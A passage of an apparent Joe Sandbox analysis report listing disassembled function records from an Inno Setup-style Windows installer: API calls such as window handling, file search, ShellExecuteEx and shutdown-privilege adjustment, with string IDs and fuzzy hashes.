                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                    • API String ID: 883996979-221126205
                                                                                    • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                    • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                                    • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                    • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                    • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1631623395-0
                                                                                    • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                    • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                                    • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                    • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 004183A3
                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                    • GetWindowRect.USER32(?), ref: 004183DC
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                    • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                    • String ID: ,
                                                                                    • API String ID: 2266315723-3772416878
                                                                                    • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                    • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                    • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                    • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                    • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                                    • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                    • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                                    • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CryptVersion
                                                                                    • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                    • API String ID: 1951258720-508647305
                                                                                    • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                    • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                                    • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                    • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                                    • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                    • API String ID: 134685335-3422211394
                                                                                    • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                    • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                                    • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                    • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                                    • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                    • API String ID: 2238633743-1050967733
                                                                                    • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                    • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                                    • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                    • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                                    APIs
                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                                    • SetForegroundWindow.USER32(?), ref: 00456841
                                                                                    • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                                    Strings
                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                    • API String ID: 2236967946-3182603685
                                                                                    • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                    • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                                    • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                    • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                    • API String ID: 1646373207-3712701948
                                                                                    • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                    • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                                    • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                    • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 00417D1F
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Placement$Iconic
                                                                                    • String ID: ,
                                                                                    • API String ID: 568898626-3772416878
                                                                                    • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                    • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                    • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                    • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                                    • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                    • String ID:
                                                                                    • API String ID: 4011626565-0
                                                                                    • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                    • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                                    • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                    • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                                    • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                    • String ID:
                                                                                    • API String ID: 4011626565-0
                                                                                    • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                    • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                                    • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                    • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                                    • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 1177325624-0
                                                                                    • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                    • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                                    • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                    • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 00481CEE
                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                                    • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$IconicLong
                                                                                    • String ID:
                                                                                    • API String ID: 2754861897-0
                                                                                    • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                    • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                                    • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                    • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                                    • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                    • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                                    • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                    • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 004241F4
                                                                                    • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                                      • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                      • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021925AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                                    • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
